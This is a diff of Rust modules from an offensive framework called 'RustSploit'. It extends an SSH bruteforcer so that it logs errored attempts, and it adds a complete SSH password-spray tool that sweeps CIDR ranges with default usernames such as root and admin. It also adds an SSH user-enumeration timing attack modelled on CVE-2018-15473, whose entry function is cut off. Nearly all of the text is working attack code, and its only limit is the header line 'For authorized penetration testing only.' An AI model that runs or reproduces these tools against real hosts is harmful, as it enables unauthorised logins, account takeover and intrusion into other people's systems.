|
||||
|
||||
// Stop progress reporter
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print final statistics
|
||||
stats.print_final();
|
||||
|
||||
let creds = found.lock().await;
|
||||
if creds.is_empty() {
|
||||
println!("\n[-] No valid community strings found.");
|
||||
println!("{}", "[-] No valid community strings found.".yellow());
|
||||
} else {
|
||||
println!("\n[+] Valid community strings:");
|
||||
println!("{}", format!("[+] Found {} valid community string(s):", creds.len()).green().bold());
|
||||
for (host, community) in creds.iter() {
|
||||
println!(" {} -> community: '{}'", host, community);
|
||||
}
|
||||
|
||||
@@ -245,6 +245,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
println!();
|
||||
|
||||
let found = Arc::new(Mutex::new(HashSet::new()));
|
||||
let unknown = Arc::new(Mutex::new(Vec::<(String, String, String, String)>::new()));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let semaphore = Arc::new(Semaphore::new(concurrency));
|
||||
@@ -293,6 +294,7 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let user_clone = user.clone();
|
||||
let pass_clone = pass.clone();
|
||||
let found_clone = Arc::clone(&found);
|
||||
let unknown_clone = Arc::clone(&unknown);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let semaphore_clone = semaphore.clone();
|
||||
@@ -302,9 +304,17 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let retry_flag = retry_on_error;
|
||||
let max_retries_clone = max_retries;
|
||||
|
||||
let permit = semaphore_clone.acquire_owned().await.unwrap();
|
||||
// Spawn task immediately - acquire permit INSIDE the task for true concurrency
|
||||
tasks.push(tokio::spawn(async move {
|
||||
let _permit = permit;
|
||||
if stop_flag && stop_clone.load(Ordering::Relaxed) {
|
||||
return;
|
||||
}
|
||||
|
||||
// Acquire semaphore permit inside the spawned task
|
||||
let _permit = match semaphore_clone.acquire_owned().await {
|
||||
Ok(permit) => permit,
|
||||
Err(_) => return,
|
||||
};
|
||||
|
||||
if stop_flag && stop_clone.load(Ordering::Relaxed) {
|
||||
return;
|
||||
@@ -332,17 +342,46 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
Err(e) => {
|
||||
stats_clone.record_attempt(false, true);
|
||||
let msg = e.to_string();
|
||||
if retry_flag && retries < max_retries_clone {
|
||||
retries += 1;
|
||||
stats_clone.record_retry();
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {} -> {}:{} (retry {}/{})", addr_clone, user_clone, pass_clone, retries, max_retries_clone).yellow());
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[!] {} -> {}:{} (retry {}/{}) - {}",
|
||||
addr_clone,
|
||||
user_clone,
|
||||
pass_clone,
|
||||
retries,
|
||||
max_retries_clone,
|
||||
msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
sleep(Duration::from_millis(500)).await;
|
||||
continue;
|
||||
} else {
|
||||
{
|
||||
let mut unk = unknown_clone.lock().await;
|
||||
unk.push((
|
||||
addr_clone.clone(),
|
||||
user_clone.clone(),
|
||||
pass_clone.clone(),
|
||||
msg.clone(),
|
||||
));
|
||||
}
|
||||
if verbose_flag {
|
||||
println!("\r{}", format!("[!] {} -> {}:{} error: {}", addr_clone, user_clone, pass_clone, e).red());
|
||||
println!(
|
||||
"\r{}",
|
||||
format!(
|
||||
"[?] {} -> {}:{} error/unknown: {}",
|
||||
addr_clone, user_clone, pass_clone, msg
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
}
|
||||
break;
|
||||
}
|
||||
@@ -353,9 +392,9 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
// Wait for all tasks
|
||||
for task in tasks {
|
||||
let _ = task.await;
|
||||
// Wait for all tasks with bounded concurrency
|
||||
while let Some(result) = tasks.pop() {
|
||||
let _ = result.await;
|
||||
}
|
||||
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
@@ -383,6 +422,60 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
drop(creds);
|
||||
|
||||
// Unknown / errored attempts
|
||||
let unknown_guard = unknown.lock().await;
|
||||
if !unknown_guard.is_empty() {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[?] Collected {} unknown/errored SSH responses.",
|
||||
unknown_guard.len()
|
||||
)
|
||||
.yellow()
|
||||
.bold()
|
||||
);
|
||||
if prompt_yes_no("Save unknown responses to file?", true)? {
|
||||
let default_name = "ssh_unknown_responses.txt";
|
||||
let fname = prompt_default(
|
||||
&format!(
|
||||
"What should the unknown results be saved as? (default: {})",
|
||||
default_name
|
||||
),
|
||||
default_name,
|
||||
)?;
|
||||
let filename = get_filename_in_current_dir(&fname);
|
||||
match File::create(&filename) {
|
||||
Ok(mut file) => {
|
||||
writeln!(
|
||||
file,
|
||||
"# SSH Bruteforce Unknown/Errored Responses (host,user,pass,error)"
|
||||
)?;
|
||||
for (host, user, pass, msg) in unknown_guard.iter() {
|
||||
writeln!(file, "{} -> {}:{} - {}", host, user, pass, msg)?;
|
||||
}
|
||||
file.flush()?;
|
||||
println!(
|
||||
"{}",
|
||||
format!("[+] Unknown responses saved to '{}'", filename.display()).green()
|
||||
);
|
||||
}
|
||||
Err(e) => {
|
||||
println!(
|
||||
"{}",
|
||||
format!(
|
||||
"[!] Could not create unknown response file '{}': {}",
|
||||
filename.display(),
|
||||
e
|
||||
)
|
||||
.red()
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
|
||||
@@ -0,0 +1,474 @@
|
||||
//! SSH Password Spray Module
|
||||
//!
|
||||
//! Based on SSHPWN framework - sprays single password across multiple targets/users.
|
||||
//! Useful for avoiding account lockouts while testing common passwords.
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
collections::HashSet,
|
||||
fs::File,
|
||||
io::{BufRead, BufReader, Write},
|
||||
net::TcpStream,
|
||||
sync::{
|
||||
atomic::{AtomicBool, AtomicU64, Ordering},
|
||||
Arc,
|
||||
},
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
use tokio::{
|
||||
sync::Semaphore,
|
||||
task::spawn_blocking,
|
||||
time::sleep,
|
||||
};
|
||||
use ipnetwork::IpNetwork;
|
||||
|
||||
const DEFAULT_SSH_PORT: u16 = 22;
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
const DEFAULT_THREADS: usize = 20;
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSH Password Spray ║".cyan());
|
||||
println!("{}", "║ Spray single password across multiple targets/users ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ Benefits: ║".cyan());
|
||||
println!("{}", "║ - Avoids account lockouts ║".cyan());
|
||||
println!("{}", "║ - Tests common passwords across many hosts ║".cyan());
|
||||
println!("{}", "║ - Efficient for large network assessments ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Statistics tracking
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful: AtomicU64,
|
||||
failed: AtomicU64,
|
||||
errors: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful: AtomicU64::new(0),
|
||||
failed: AtomicU64::new(0),
|
||||
errors: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.errors.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful.load(Ordering::Relaxed);
|
||||
let failed = self.failed.load(Ordering::Relaxed);
|
||||
let errors = self.errors.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
||||
rate
|
||||
);
|
||||
let _ = std::io::stdout().flush();
|
||||
}
|
||||
|
||||
fn print_summary(&self) {
|
||||
println!();
|
||||
println!("{}", "=== Spray Summary ===".cyan().bold());
|
||||
println!("Total attempts: {}", self.total_attempts.load(Ordering::Relaxed));
|
||||
println!("Successful: {}", self.successful.load(Ordering::Relaxed).to_string().green());
|
||||
println!("Failed: {}", self.failed.load(Ordering::Relaxed));
|
||||
println!("Errors: {}", self.errors.load(Ordering::Relaxed));
|
||||
println!("Elapsed: {:.2}s", self.start_time.elapsed().as_secs_f64());
|
||||
}
|
||||
}
|
||||
|
||||
/// Credential result
|
||||
#[derive(Clone, Debug)]
|
||||
pub struct SprayResult {
|
||||
pub host: String,
|
||||
pub port: u16,
|
||||
pub username: String,
|
||||
pub password: String,
|
||||
}
|
||||
|
||||
/// Try SSH authentication
|
||||
fn try_ssh_auth(host: &str, port: u16, username: &str, password: &str, timeout_secs: u64) -> Result<bool> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
|
||||
let tcp = TcpStream::connect_timeout(
|
||||
&addr.parse()?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
)?;
|
||||
|
||||
tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)))?;
|
||||
|
||||
let mut sess = Session::new()?;
|
||||
sess.set_tcp_stream(tcp);
|
||||
sess.handshake()?;
|
||||
|
||||
match sess.userauth_password(username, password) {
|
||||
Ok(_) => Ok(sess.authenticated()),
|
||||
Err(_) => Ok(false),
|
||||
}
|
||||
}
|
||||
|
||||
/// Parse targets from string (CIDR, range, single IP)
|
||||
fn parse_targets(spec: &str, port: u16) -> Vec<(String, u16)> {
|
||||
let mut targets = Vec::new();
|
||||
|
||||
for s in spec.split(&[',', ' ', '\n'][..]) {
|
||||
let s = s.trim();
|
||||
if s.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Try CIDR
|
||||
if s.contains('/') {
|
||||
if let Ok(network) = s.parse::<IpNetwork>() {
|
||||
for ip in network.iter().take(65536) {
|
||||
targets.push((ip.to_string(), port));
|
||||
}
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
// Try IP range (e.g., 192.168.1.1-254)
|
||||
if s.contains('-') && s.contains('.') {
|
||||
let parts: Vec<&str> = s.rsplitn(2, '.').collect();
|
||||
if parts.len() == 2 {
|
||||
if let Some((start_str, end_str)) = parts[0].split_once('-') {
|
||||
if let (Ok(start), Ok(end)) = (start_str.parse::<u8>(), end_str.parse::<u8>()) {
|
||||
let base = parts[1];
|
||||
for i in start..=end {
|
||||
targets.push((format!("{}.{}", base, i), port));
|
||||
}
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Single IP/hostname
|
||||
targets.push((s.to_string(), port));
|
||||
}
|
||||
|
||||
targets
|
||||
}
|
||||
|
||||
/// Load list from file
|
||||
fn load_list_from_file(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path)?;
|
||||
let reader = BufReader::new(file);
|
||||
let items: Vec<String> = reader
|
||||
.lines()
|
||||
.filter_map(|l| l.ok())
|
||||
.map(|l| l.trim().to_string())
|
||||
.filter(|l| !l.is_empty() && !l.starts_with('#'))
|
||||
.collect();
|
||||
Ok(items)
|
||||
}
|
||||
|
||||
/// Main spray function
|
||||
pub async fn password_spray(
|
||||
targets: Vec<(String, u16)>,
|
||||
usernames: &[String],
|
||||
password: &str,
|
||||
threads: usize,
|
||||
timeout_secs: u64,
|
||||
) -> Vec<SprayResult> {
|
||||
let total = targets.len() * usernames.len();
|
||||
println!("{}", format!("[*] Spraying '{}' against {} targets, {} users ({} total attempts)",
|
||||
password, targets.len(), usernames.len(), total).cyan());
|
||||
|
||||
let results = Arc::new(tokio::sync::Mutex::new(Vec::new()));
|
||||
let stats = Arc::new(Statistics::new());
|
||||
let semaphore = Arc::new(Semaphore::new(threads));
|
||||
let stop = Arc::new(AtomicBool::new(false));
|
||||
|
||||
// Progress reporter
|
||||
let stats_clone = Arc::clone(&stats);
|
||||
let stop_clone = Arc::clone(&stop);
|
||||
let progress_handle = tokio::spawn(async move {
|
||||
while !stop_clone.load(Ordering::Relaxed) {
|
||||
stats_clone.print_progress();
|
||||
sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS)).await;
|
||||
}
|
||||
});
|
||||
|
||||
// Spray tasks
|
||||
let mut handles = Vec::new();
|
||||
|
||||
for (host, port) in targets {
|
||||
for user in usernames {
|
||||
let semaphore = Arc::clone(&semaphore);
|
||||
let results = Arc::clone(&results);
|
||||
let stats = Arc::clone(&stats);
|
||||
let host = host.clone();
|
||||
let user = user.clone();
|
||||
let password = password.to_string();
|
||||
|
||||
let handle = tokio::spawn(async move {
|
||||
let _permit = semaphore.acquire().await.unwrap();
|
||||
|
||||
let host_clone = host.clone();
|
||||
let user_clone = user.clone();
|
||||
let pass_clone = password.clone();
|
||||
|
||||
let result = spawn_blocking(move || {
|
||||
try_ssh_auth(&host_clone, port, &user_clone, &pass_clone, timeout_secs)
|
||||
}).await;
|
||||
|
||||
match result {
|
||||
Ok(Ok(true)) => {
|
||||
stats.record_attempt(true, false);
|
||||
let cred = SprayResult {
|
||||
host: host.clone(),
|
||||
port,
|
||||
username: user.clone(),
|
||||
password: password.clone(),
|
||||
};
|
||||
println!("\r{}", format!("[PWNED] {}:{} @ {}:{}", user, password, host, port).red().bold());
|
||||
let _ = std::io::stdout().flush();
|
||||
results.lock().await.push(cred);
|
||||
}
|
||||
Ok(Ok(false)) => {
|
||||
stats.record_attempt(false, false);
|
||||
}
|
||||
_ => {
|
||||
stats.record_attempt(false, true);
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
handles.push(handle);
|
||||
}
|
||||
}
|
||||
|
||||
// Wait for all tasks
|
||||
for handle in handles {
|
||||
let _ = handle.await;
|
||||
}
|
||||
|
||||
// Stop progress reporter
|
||||
stop.store(true, Ordering::Relaxed);
|
||||
let _ = progress_handle.await;
|
||||
|
||||
// Print summary
|
||||
stats.print_summary();
|
||||
|
||||
let results = results.lock().await;
|
||||
results.clone()
|
||||
}
|
||||
|
||||
/// Save results to file
|
||||
fn save_results(results: &[SprayResult], path: &str) -> Result<()> {
|
||||
let mut file = File::create(path)?;
|
||||
|
||||
writeln!(file, "# SSH Password Spray Results")?;
|
||||
writeln!(file, "# Generated by RustSploit")?;
|
||||
writeln!(file, "# Total: {} credentials found", results.len())?;
|
||||
writeln!(file)?;
|
||||
|
||||
for result in results {
|
||||
writeln!(file, "{}:{} @ {}:{}", result.username, result.password, result.host, result.port)?;
|
||||
}
|
||||
|
||||
println!("{}", format!("[+] Results saved to: {}", path).green());
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{} [{}]: ", message, hint);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
/// Default usernames to spray
|
||||
const DEFAULT_USERNAMES: &[&str] = &[
|
||||
"root", "admin", "user", "administrator", "ubuntu",
|
||||
"guest", "test", "oracle", "postgres", "mysql",
|
||||
];
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
// Get password to spray
|
||||
let password = prompt("Password to spray")?;
|
||||
if password.is_empty() {
|
||||
return Err(anyhow!("Password is required"));
|
||||
}
|
||||
|
||||
// Get port
|
||||
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(DEFAULT_SSH_PORT);
|
||||
|
||||
// Get targets
|
||||
let mut targets = Vec::new();
|
||||
|
||||
// Add initial target
|
||||
let host = normalize_target(target);
|
||||
if !host.is_empty() {
|
||||
println!("{}", format!("[*] Initial target: {}", host).cyan());
|
||||
targets.extend(parse_targets(&host, port));
|
||||
}
|
||||
|
||||
// Get additional targets
|
||||
let more_targets = prompt("Additional targets (comma-separated, CIDR, or leave empty)")?;
|
||||
if !more_targets.is_empty() {
|
||||
targets.extend(parse_targets(&more_targets, port));
|
||||
}
|
||||
|
||||
// Load from file?
|
||||
if prompt_yes_no("Load targets from file?", false)? {
|
||||
let file_path = prompt("File path")?;
|
||||
if !file_path.is_empty() {
|
||||
match load_list_from_file(&file_path) {
|
||||
Ok(file_targets) => {
|
||||
println!("{}", format!("[*] Loaded {} targets from file", file_targets.len()).cyan());
|
||||
for t in file_targets {
|
||||
targets.extend(parse_targets(&t, port));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Failed to load file: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Deduplicate targets
|
||||
let unique: HashSet<_> = targets.into_iter().collect();
|
||||
let targets: Vec<_> = unique.into_iter().collect();
|
||||
|
||||
if targets.is_empty() {
|
||||
return Err(anyhow!("No targets specified"));
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Total unique targets: {}", targets.len()).cyan());
|
||||
|
||||
// Get usernames
|
||||
let mut usernames: Vec<String> = Vec::new();
|
||||
|
||||
if prompt_yes_no("Load usernames from file?", false)? {
|
||||
let file_path = prompt("Username file path")?;
|
||||
if !file_path.is_empty() {
|
||||
match load_list_from_file(&file_path) {
|
||||
Ok(loaded) => {
|
||||
println!("{}", format!("[*] Loaded {} usernames from file", loaded.len()).cyan());
|
||||
usernames.extend(loaded);
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Failed to load file: {}", e).red());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Add default usernames?
|
||||
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true)? {
|
||||
for user in DEFAULT_USERNAMES {
|
||||
if !usernames.contains(&user.to_string()) {
|
||||
usernames.push(user.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if usernames.is_empty() {
|
||||
return Err(anyhow!("No usernames to test"));
|
||||
}
|
||||
|
||||
// Get scan options
|
||||
let threads: usize = prompt_default("Concurrent threads", &DEFAULT_THREADS.to_string())?
|
||||
.parse()
|
||||
.unwrap_or(DEFAULT_THREADS);
|
||||
let timeout: u64 = prompt_default("Connection timeout (seconds)", &DEFAULT_TIMEOUT_SECS.to_string())?
|
||||
.parse()
|
||||
.unwrap_or(DEFAULT_TIMEOUT_SECS);
|
||||
|
||||
println!();
|
||||
|
||||
// Run spray
|
||||
let results = password_spray(targets, &usernames, &password, threads, timeout).await;
|
||||
|
||||
// Save results?
|
||||
if !results.is_empty() && prompt_yes_no("Save results to file?", true)? {
|
||||
let output_path = prompt_default("Output file", "ssh_spray_results.txt")?;
|
||||
if let Err(e) = save_results(&results, &output_path) {
|
||||
println!("{}", format!("[-] Failed to save: {}", e).red());
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", format!("[*] Password spray complete. Found {} valid credentials.", results.len()).green());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -0,0 +1,295 @@
|
||||
//! SSH User Enumeration Module (Timing Attack)
|
||||
//!
|
||||
//! Based on SSHPWN framework - enumerates valid users via timing attack.
|
||||
//! Inspired by CVE-2018-15473 style attacks.
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Result};
|
||||
use colored::*;
|
||||
use ssh2::Session;
|
||||
use std::{
|
||||
fs::File,
|
||||
io::{BufRead, BufReader, Write},
|
||||
net::TcpStream,
|
||||
time::{Duration, Instant},
|
||||
};
|
||||
|
||||
const DEFAULT_SSH_PORT: u16 = 22;
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
const DEFAULT_SAMPLES: usize = 3;
|
||||
const TIMING_THRESHOLD: f64 = 0.3; // 300ms difference threshold
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ SSH User Enumeration (Timing Attack) ║".cyan());
|
||||
println!("{}", "║ Based on auth2.c timing differences ║".cyan());
|
||||
println!("{}", "║ ║".cyan());
|
||||
println!("{}", "║ How it works: ║".cyan());
|
||||
println!("{}", "║ - Measures authentication response time for each username ║".cyan());
|
||||
println!("{}", "║ - Valid users often have different timing than invalid ║".cyan());
|
||||
println!("{}", "║ - Compares against baseline (known invalid user) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Normalize target for connection
|
||||
fn normalize_target(target: &str) -> String {
|
||||
let trimmed = target.trim();
|
||||
if trimmed.starts_with('[') && trimmed.contains(']') {
|
||||
trimmed.to_string()
|
||||
} else if trimmed.contains(':') && !trimmed.contains('.') {
|
||||
format!("[{}]", trimmed)
|
||||
} else {
|
||||
trimmed.to_string()
|
||||
}
|
||||
}
|
||||
|
||||
/// Time a single authentication attempt
|
||||
fn time_auth_attempt(host: &str, port: u16, username: &str, timeout_secs: u64) -> Option<f64> {
|
||||
let addr = format!("{}:{}", host, port);
|
||||
|
||||
let start = Instant::now();
|
||||
|
||||
let tcp = match TcpStream::connect_timeout(
|
||||
&addr.parse().ok()?,
|
||||
Duration::from_secs(timeout_secs),
|
||||
) {
|
||||
Ok(s) => s,
|
||||
Err(_) => return None,
|
||||
};
|
||||
|
||||
let _ = tcp.set_read_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
let _ = tcp.set_write_timeout(Some(Duration::from_secs(timeout_secs)));
|
||||
|
||||
let mut sess = match Session::new() {
|
||||
Ok(s) => s,
|
||||
Err(_) => return None,
|
||||
};
|
||||
|
||||
sess.set_tcp_stream(tcp);
|
||||
if sess.handshake().is_err() {
|
||||
return None;
|
||||
}
|
||||
|
||||
// Try authentication with invalid password
|
||||
let invalid_password = format!("invalid_{}_{}", std::process::id(), start.elapsed().as_nanos());
|
||||
let _ = sess.userauth_password(username, &invalid_password);
|
||||
|
||||
let elapsed = start.elapsed().as_secs_f64();
|
||||
Some(elapsed)
|
||||
}
|
||||
|
||||
/// Sample authentication timing for a username
|
||||
fn sample_auth_timing(host: &str, port: u16, username: &str, samples: usize, timeout_secs: u64) -> Option<f64> {
|
||||
let mut times = Vec::new();
|
||||
|
||||
for _ in 0..samples {
|
||||
if let Some(t) = time_auth_attempt(host, port, username, timeout_secs) {
|
||||
times.push(t);
|
||||
}
|
||||
// Small delay between samples
|
||||
std::thread::sleep(Duration::from_millis(100));
|
||||
}
|
||||
|
||||
if times.is_empty() {
|
||||
return None;
|
||||
}
|
||||
|
||||
// Return average
|
||||
Some(times.iter().sum::<f64>() / times.len() as f64)
|
||||
}
|
||||
|
||||
/// Load usernames from file
|
||||
fn load_usernames(path: &str) -> Result<Vec<String>> {
|
||||
let file = File::open(path)?;
|
||||
let reader = BufReader::new(file);
|
||||
let usernames: Vec<String> = reader
|
||||
.lines()
|
||||
.filter_map(|l| l.ok())
|
||||
.map(|l| l.trim().to_string())
|
||||
.filter(|l| !l.is_empty() && !l.starts_with('#'))
|
||||
.collect();
|
||||
Ok(usernames)
|
||||
}
|
||||
|
||||
/// Enumerate valid users via timing attack
|
||||
pub async fn enumerate_users(
|
||||
host: &str,
|
||||
port: u16,
|
||||
usernames: &[String],
|
||||
samples: usize,
|
||||
timeout_secs: u64,
|
||||
threshold: f64,
|
||||
) -> Vec<String> {
|
||||
println!("{}", format!("[*] Enumerating users on {}:{} (timing attack)", host, port).cyan());
|
||||
println!("{}", format!("[*] Testing {} usernames with {} samples each", usernames.len(), samples).cyan());
|
||||
println!("{}", format!("[*] Timing threshold: {:.3}s", threshold).cyan());
|
||||
println!();
|
||||
|
||||
// Establish baseline with known-invalid user
|
||||
let baseline_user = format!("nonexistent_{}_{}", std::process::id(), Instant::now().elapsed().as_nanos());
|
||||
println!("{}", "[*] Establishing baseline timing...".cyan());
|
||||
|
||||
let baseline = match sample_auth_timing(host, port, &baseline_user, samples, timeout_secs) {
|
||||
Some(t) => {
|
||||
println!("{}", format!("[*] Baseline timing: {:.3}s", t).cyan());
|
||||
t
|
||||
}
|
||||
None => {
|
||||
println!("{}", "[-] Failed to establish baseline - cannot reach target".red());
|
||||
return Vec::new();
|
||||
}
|
||||
};
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Testing usernames...".cyan());
|
||||
|
||||
let mut valid_users = Vec::new();
|
||||
|
||||
for (i, user) in usernames.iter().enumerate() {
|
||||
print!("\r[{}/{}] Testing: {} ", i + 1, usernames.len(), user);
|
||||
let _ = std::io::stdout().flush();
|
||||
|
||||
match sample_auth_timing(host, port, user, samples, timeout_secs) {
|
||||
Some(t) => {
|
||||
let diff = t - baseline;
|
||||
if diff.abs() > threshold {
|
||||
println!("\r{}", format!("[+] Valid user: {} (timing diff: {:+.3}s)", user, diff).green());
|
||||
valid_users.push(user.clone());
|
||||
}
|
||||
}
|
||||
None => {
|
||||
// Connection failed, skip
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!();
|
||||
println!("{}", "=== Results ===".cyan().bold());
|
||||
if valid_users.is_empty() {
|
||||
println!("{}", "[-] No valid users found via timing attack".yellow());
|
||||
println!("{}", "[*] Note: This technique may not work on all SSH configurations".dimmed());
|
||||
} else {
|
||||
println!("{}", format!("[+] Found {} valid user(s):", valid_users.len()).green());
|
||||
for user in &valid_users {
|
||||
println!(" - {}", user.green());
|
||||
}
|
||||
}
|
||||
|
||||
valid_users
|
||||
}
|
||||
|
||||
/// Prompt helper
|
||||
fn prompt(message: &str) -> Result<String> {
|
||||
print!("{}: ", message);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
Ok(input.trim().to_string())
|
||||
}
|
||||
|
||||
fn prompt_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{} [{}]: ", message, default);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{} [{}]: ", message, hint);
|
||||
std::io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
std::io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
/// Default usernames to test
|
||||
const DEFAULT_USERNAMES: &[&str] = &[
|
||||
"root", "admin", "user", "test", "guest",
|
||||
"ubuntu", "www-data", "daemon", "bin", "sys",
|
||||
"nobody", "mysql", "postgres", "oracle", "ftp",
|
||||
"ssh", "apache", "nginx", "tomcat", "redis",
|
||||
];
|
||||
|
||||
/// Main entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
|
